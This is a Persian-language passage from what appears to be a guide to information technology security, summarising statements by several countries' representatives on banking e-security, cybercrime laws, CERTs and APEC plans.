ﺍﻣﻨﻴﺘ ـﻲ ﻭ ﻧﻈــﺎﺭﺗﻲ ﺑــﺴﻴﺎﺭﻱ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﻓﻨــﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺗﺨﺼﺺ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺑﻌﻼﻭﻩ ﻣﻜﺰﻳﻚ ﺗﻮﺻـﻴﻪﻫـﺎﻱ
BASELﺭﺍ ﺑﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﻟﺤـﺎﻅ ﻛـﺮﺩﻩ
ﺍﺳﺖ.
ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺳﺆﺍﻝ ﺳﻮﻡ ،ﻣﻜﺰﻳﻜﻲﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ
ﺗﺠﺮﺑﻴﺎﺕ ،ﺍﺭﺯﻳﺎﺑﻲﻫﺎ ﻭ ﻧﻴﺎﺯﻫﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺎﻧﻲ
ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺒﺎﺩﻟﻪ ﺷﻮﺩ.
ﺑﺨﺶ ﺳﻮﻡ
.۱
ﺩﺭ ﺯﻣﻴﻨﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻪ ﻧﮕﺮﺷـﻬﺎﻳﻲ
ﻣﻲ ﺑﻴﻨﻴﺪ؟ ﺑﺰﺭﮔﺘﺮﻳﻦ ﭼﺎﻟﺸﻬﺎ ﻳﺎ ﺁﺳﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎ ﻛﺪﺍﻣﻨـﺪ؟
)ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ ،ﭘﻮﻟـﺸﻮﻳﻲ ﺍﻳﻨﺘﺮﻧﺘـﻲ ،ﻳـﺎ ﺳـﺎﻳﺮ
ﺍﹶﺷﻜﺎﻝ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(
ﭘﺎﺳﺦ
٢٢٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﭘﺮﺳﺶ
ﺹ ﻋﻤﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺳﺆﺍﻝ ﻛﺮﺩ.
ﻣﻜﺰﻳﻚ ﺩﺭﺧﺼﻮ ﹺ
ﭘﺎﺳﺦ
ﺗﺠﺮﺑﻴﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺩﺳﺘﺮﺱ
ﺍﺳﺖ ٢٣٧.ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫـﺎ ﺷـﺎﻣﻞ ۲۶ﻓﻌﺎﻟﻴـﺖ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،ﻭﺻـﻠﻪﻫـﺎ ،ﻧﻘـﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺿﺪﻭﻳﺮﻭﺱ ،ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ،ﻭ ﻏﻴﺮﻩ ﻫﺴﺘﻨﺪ.
ﻛﻠﻤﺒﻴﺎ
ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﺑﻴﺎﻥ ﺩﺍﺷﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻳﻤﻨﻲ ﺁﻧﻬﺎ ﻣﺎﻧﻨﺪ ﺳﺎﻳﺮ
ﻛﺸﻮﺭﻫﺎ ﺍﺳﺖ ﻭ ﺁﻧﻬﺎ ﻧﻴﺰ ﺧﻮﺩ ﺭﺍ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣـﻲﺑﻴﻨﻨـﺪ .ﺩﺭﺣـﺎﻝ
ﺣﺎﺿﺮ ﺍﻳﻦ ﻛﺸﻮﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻧﺪﺍﺭﺩ ﻭ
ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻧـﺸﺪﻩ
ﺍﺳﺖ .ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻱ ﻛﻠﻤﺒﻴﺎﻳﻲ ﻣﺴﺘﻌﺪ ﻫﺴﺘﻨﺪﻛﻪ ﻗﺮﺑـﺎﻧﻲ
ﺣﻤﻼﺕ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ،ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ،
ﻛﺎﺭﺗﻬــﺎﻱ ﺑــﺎﻧﻜﻲ ﺟﻌــﻞ ﻣــﻲﺷــﻮﻧﺪ ،ﻗــﺎﻧﻮﻧﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ
ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ ،ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺗﻨﻬـﺎ ﺑـﺮ ﻋﻬـﺪﺓ
ﻣﻤﻴﺰﻫﺎ ﺍﺳﺖ PKI ،ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﺍﻣـﺎ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺣـﺪ ﻣﻘـﺪﻣﺎﺗﻲ ﺍﺳـﺖ ،ﻛﺎﺭﻣﻨـﺪﺍﻥ
ﻻ ﺑﻪ ﺩﺳﺘﻮﺭﺍﺕ ﺍﻳﻤﻨﻲ ﺑﻲﺗـﻮﺟﻬﻲ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﻣﻌﻤﻮ ﹰ
ﻓﺮﻫﻨﮓ ﺑﺎﻧﻜﻲ ﻛﻠﻤﺒﻴﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺻـﺤﻴﺢ ﺧـﻮﺩ ﻗـﺮﺍﺭ ﻧـﺪﺍﺭﺩ ،ﻭ
ﻋﻼﻭﻩ ﺑﺮ ﻫﻤﺔ ﺍﻳﻨﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﻪﺭﻭﺯ ﻣﺎﻧﺪﻥ ﻧﻴﺰ ﻳﻚ ﻣﺸﻜﻞ
ﺍﺳﺎﺳﻲ ﻣﻲﺑﺎﺷﺪ.
ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣﺆﺳـﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒـﻪ ﻧﻘـﺸﻲ
ﺍﺳﺎﺳــﻲ ﺩﺍﺭﻧــﺪ .ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ UNCITRALﺑــﺮﺍﻱ ﺟــﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﭼﻮﻥ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳﺖ ،ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ ،ﻭ
ﻫﻤﭽﻨﻴﻦ ﻣﻌﺎﻣﻼﺕ ،ﻳﻚ ﻗﺎﻧﻮﻥ ﻣﺮﺟﻊ ﺩﺍﺭﺩ .ﺧﺼﻮﺻﻴﺖ ﻗـﻮﺍﻧﻴﻦ
ﻣﺮﺟﻊ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻼﻑ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﺩﻱ ﺑﺎﻳـﺪ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﻗﻮﺍﻧﻴﻦ ﻣﺪﻧﻲ ﺑﺎﺷﻨﺪ.
ﭘﺮﺳﺶ
ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﭘﺮﺳﻴﺪ ﻛﻪ ﺟﺎﻣﻌﻴﺖ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ،
ﺑﺨﺼﻮﺹ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ،ﭼﻄﻮﺭ ﺯﻳﺮ ﺳﺆﺍﻝ ﻣـﻲﺭﻭﺩ.
ﻣﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﻣـﺪﻳﺮﻳﺖ ﻣﺨـﺎﻃﺮﺍﺕ ،ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ
237 http://wbln0018.worldbank.org/ html/Financial
SectorWeb.nsf/(attachmentweb)/Singpore_TR
Mguidelines28Feb03/$FILE/Singpore_TRMgu
idelines28Feb0
ﺍﺳﺎﺳﻲ ﻫﺴﺘﻨﺪ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ.
ﭘﺎﺳﺦ
ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﻗﻀﺎﻳﻲ ،ﺣﺘﻲ ﺩﺭ ﺗﺸﺨﻴﺺ ﻣﺤﻞ ﻭﻗﻮﻉ ﺟـﺮﻡ
ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ .ﺑـﺮﺍﻱ
ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻳﻚ ﺯﺑﺎﻥ ﻣﺸﺘﺮﻙ ﺗﻮﺻـﻴﻒ ﻣـﺸﻜﻼﺕ ،ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ
ﻼ
ﻛﺎﻫﺶ ﺁﻧﻬﺎ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺗـﺪﻭﻳﻦ ﺷـﻮﻧﺪ .ﻣـﺜ ﹰ
ﺗﻌﺮﻳﻒ "ﻛﻼﻫﺒﺮﺩﺍﺭﻱ" ﺩﺭ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻫﻤﺮﺍﻩ ﺑﻮﺩ.
ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ،ﻛﻤﻴﺘـﺔ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺎﻟﻲ ) ٢٣٨(FATFﺍﺳﺖ ﻛﻪ ﺑﺎ ﭘﻮﻟـﺸﻮﻳﻲ ﻭ ﺗﺮﻭﺭﻳـﺴﻢ
ﻣﺒﺎﺭﺯﻩ ﻣﻲﻛﻨﺪ.
ﺍﻭﻛﺮﺍﻳﻦ
ﭘــﺲ ﺍﺯ ﺍﺳــﺘﻘﻼﻝ ﺍﻭﻛــﺮﺍﻳﻦ ،ﺩﺭ ﺳﻴــﺴﺘﻢ ﺑــﺎﻧﻜﻲ ﺍﻳــﻦ ﻛــﺸﻮﺭ
ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺥ ﺩﺍﺩ ﻭ ﺑﺎﻋﺚ ﺷﺪ ﺩﺭ ﺁﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ .ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺜـﻞ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ
ﺭﻣﺰﻧﮕــﺎﺭﻱ ﺗﻮﺳــﻂ ﺑﺎﻧــﻚ ﻣﻠــﻲ ﺍﺩﺍﺭﻩ ﻣــﻲﺷــﻮﻧﺪ ٢٣٩.ﺍﺯ ﺯﻣــﺎﻥ
ﺍﺳﺘﻘﻼﻝ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﻗﻮﺍﻧﻴﻦ ﺍﻣﻀﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩﺍﻧﺪ .ﻋﻠﻴﺮﻏﻢ ﺑﺮﺧﻲ ﺗﻼﺷﻬﺎ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺳﻴـﺴﺘﻢ
ﺑﺎﻧﻜﻲ ،ﺗﺎﻛﻨﻮﻥ ﺧﺴﺎﺭﺕ ﺧﺎﺻﻲ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﺣﻮﺯﺓ ﻗﻮﺍﻧﻴﻦ ،ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ
ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩ ﻭ ﺍﺯ ﺁﻥ ﭘﺲ ﺑﻪ ﺗﻌﻘﻴﺐ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﭘﺮﺩﺍﺧﺖ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﭘﺎﺭﻟﻤﺎﻥ ﺁﻥ ﻛﺸﻮﺭ ﻳﻚ ﻗﺎﻧﻮﻥ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻣﺘﻦ
ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺑﻪ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺗﻮﺟﻪ ﺷﺪﻩ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ
ﻗﻮﺍﻧﻴﻦ ﺗﺄﺛﻴﺮ ﻛﻤﻲ ﺑﺮ ﺟﺎﻱ ﻣﻲﮔﺬﺍﺭﻧﺪ ،ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬـﺎ
ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻋﺎﻣﻞ "ﻋﻤﺪ" ﻭ "ﻗﺼﺪ" ﺩﺭ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺑﻪ ﺍﺛﺒﺎﺕ ﺑﺮﺳﺪ.
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣـﻮﺍﺭﺩ ،ﺗﻌﻘﻴـﺐ ﻧﺎﻛـﺎﻓﻲ ﺟـﺮﺍﺋﻢ ﺑـﻪ ﻳـﻚ ﺭﻭﺍﻝ
ﺭﻭﺯﻣﺮﻩ ﺑﺪﻝ ﺷﺪﻩ ،ﭼﻮﻥ ﺍﺭﺍﺋﻪ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒـﺎﺕ
ﺗﻌﻤﺪﻱ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﻭﺍﻗﻌﹰﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ
ﺍﻣﻨﻴﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ
ﺍﺛﺒﺎﺕ ﺟﺮﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﺑﺒﻴﻨﻨﺪ.
ﭘﺮﺳﺶ
ﺳﺌﻮﺍﻝ ﺍﺻﻠﻲ ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﺁﻭﺭﺩﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﺗﻌﻬـﺪ ﺑـﺎ
238 Financial Action Task Force
۲۳۹ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺗﻤﺎﻡ ﺑﺎﻧﻜﻬﺎ ﺟﺰﺋﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻚ ﻣﻠﻲ ﻣﺤﺴﻮﺏ ﻣـﻲ-
ﺷﻮﻧﺪ.
٢٢٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺍﺧﻠﻲ ﻭ ﮔـﺰﺍﺭﺵ ﺑـﻮﺩ .ﺑﻌﻨـﻮﺍﻥ
ﻧﻤﻮﻧﻪ ،ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩ ﻫﺎ ﺗﻮﺳﻂ ﻣﺄﻣﻮﺭﺍﻥ ﺑـﺎﻧﻜﻲ ﺑـﺮﺍﻱ ﺍﻳﻤﻨـﻲ
ﺑﺎﻧﻚ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﻇﺮﻓﻴﺘﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ
ﺭﺧﺪﺍﺩﻫﺎ ،ﻳﻚ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺍﻭﻛـﺮﺍﻳﻦ
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﭘﺎﺳﺦ
APECﺑﻪ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ ﺧﻮﺍﻫـﺪ ﭘﺮﺩﺍﺧـﺖ ﻭ ﺑﻄـﻮﺭ
ﺧﻼﺻﻪ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ Wi-Fiﻫﻢ ﻣﻲﭘﺮﺩﺍﺯﺩ.
ﺳﻮﻡ ،ﺗﺎ ﺁﺧﺮ ﺍﻛﺘﺒﺮ ۲۰۰۳ﺩﺭ ﺗﻤـﺎﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ APEC
ﻣﺮﺍﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﺸﻜﻴﻞ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﭼﻴﻦ ،ﭘﻜﻦ
ﺍﺳﺘﺮﺍﻟﻴﺎ ﺟﻬﺖ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺍﻃﻼﻋﺎﺕ BASEL2 ،ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻭ
ﭘﻴﺎﺩﻩ ﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺁﻧﻬﺎ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛـﻪ ﺍﺳـﺘﻔﺎﺩﺓ
ﺭﻭﺯﺍﻓﺰﻭﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ ﺗﺸﺨﻴـﺼﻬﺎﻱ
ﻣﺜﺒﺖ ﻧﺎﺻﺤﻴﺢ ) (false positiveﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗﻨﻈـﻴﻢﻧـﺸﺪﻩ
ﭼﻨﺪﺍﻥ ﺁﺳﺎﻥ ﻧﻴﺴﺖ .ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﭘﻴﺸﻴﻦ ﺳﺎﺧﺘﻪ ﻣـﻲ ﺷـﻮﻧﺪ ،ﻭ ﺍﻳـﻦ ﺑـﻪ ﭘﻴﭽﻴـﺪﮔﻲ ﻭ ﻭﺍﺑـﺴﺘﮕﻲ
ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺩﺍﻣﻦ ﻣﻲ ﺯﻧﺪ .ﺩﺭ ﻫﻤﻴﻨﺤﺎﻝ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻧﺤﻮﺓ ﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻧﻴﺰ ﺑﻪ ﺧﻮﺑﻲ ﻣـﺴﺘﻨﺪ ﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ.
ﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﻳﻜـﺪﻳﮕﺮ
ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕ ﹺ
ﻻ ﻣـﺴﺘﻨﺪﺍﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ ،ﺑـﺴﻴﺎﺭ
ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ
ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ .ﻧﻤﺎﻳﻨﺪﺓ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺩﺭ
ﺍﻳﻦ ﻛﺸﻮﺭ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ
ﺗﺨﺼﺼﻲ ﺑﺮﺍﻱ downloadﻛﺮﺩﻥ ﻓﺮﺍﻫﻢ ﺍﺳﺖ.
ﻋﻠﻴﺮﻏﻢ ﺍﻭﺿﺎﻉ ﻧﺎﻣﺴﺎﻋﺪ ﺍﻣﻨﻴﺘـﻲ ،ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﭼـﻴﻦ
ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷـﺪ ﻫـﺴﺘﻨﺪ .ﺗﻌـﺪﺍﺩ ﺍﻳـﻦ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺧـﻼﻝ
ﺳﺎﻟﻬﺎﻱ ۱۹۹۹ﺗﺎ ۲۰۰۳ﺍﺯ ﻳﻚ ﺑﻪ ﺑﻴﺴﺖ ﻭ ﻫﻔﺖ ﺭﺳﻴﺪﻩ ﻭ ﻧﻴﺰ
ﺣﺠﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﻴﺶ ﺍﺯ ۱۰۰ﺑﺮﺍﺑﺮ ﺭﺷﺪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﻪ
ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﺩﺭ ﺯﻣـﺎﻥ ﺷـﻴﻮﻉ ﺑﻴﻤـﺎﺭﻱ ﺳـﺎﺭﺱ،
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭﻧﻖ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩ .ﻧﻬﺎﻳﺘـﹰﺎ ﻛـﺸﻮﺭ ﭼـﻴﻦ
ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ:
ﺍﺳﺘﺮﺍﻟﻴﺎ
ﺍﺳﺘﺮﺍﻟﻴﺎ ﺳﻪ ﻧﻜﺘﻪ ﺍﺳﺎﺳﻲ ﺭﺍ ﻣﻄﺮﺡ ﻛﺮﺩ.
ﺍﻭﻝ ،ﺗــﺎ ﺍﻛﺘﺒــﺮ ۲۰۰۳ﺩﺭ ﺗﻤــﺎﻣﻲ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ APEC
ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻗﻮﺍﻧﻴﻨﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻛﻪ ﻣﻮﺍﺭﺩﻱ
ﭼﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻤـﺎﻝ ﻗـﻮﺍﻧﻴﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ.
ﺩﻭﻡ ،ﺁﻣــﻮﺯﺵ ﻭ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﺟــﺮﺍﻱ ﻗــﺎﻧﻮﻥ ﺩﺭ ﻫﻤــﺔ
ﺳﻄﻮﺡ ﻻﺯﻡ ﺍﺳﺖ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺑـﺼﻮﺭﺕ
ﺧﻼﺻﻪ ﺩﺭ ﺍﻳﻦ ﺩﻭﺭﻩﻫﺎ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ .ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ
.۱
.۲
.۳
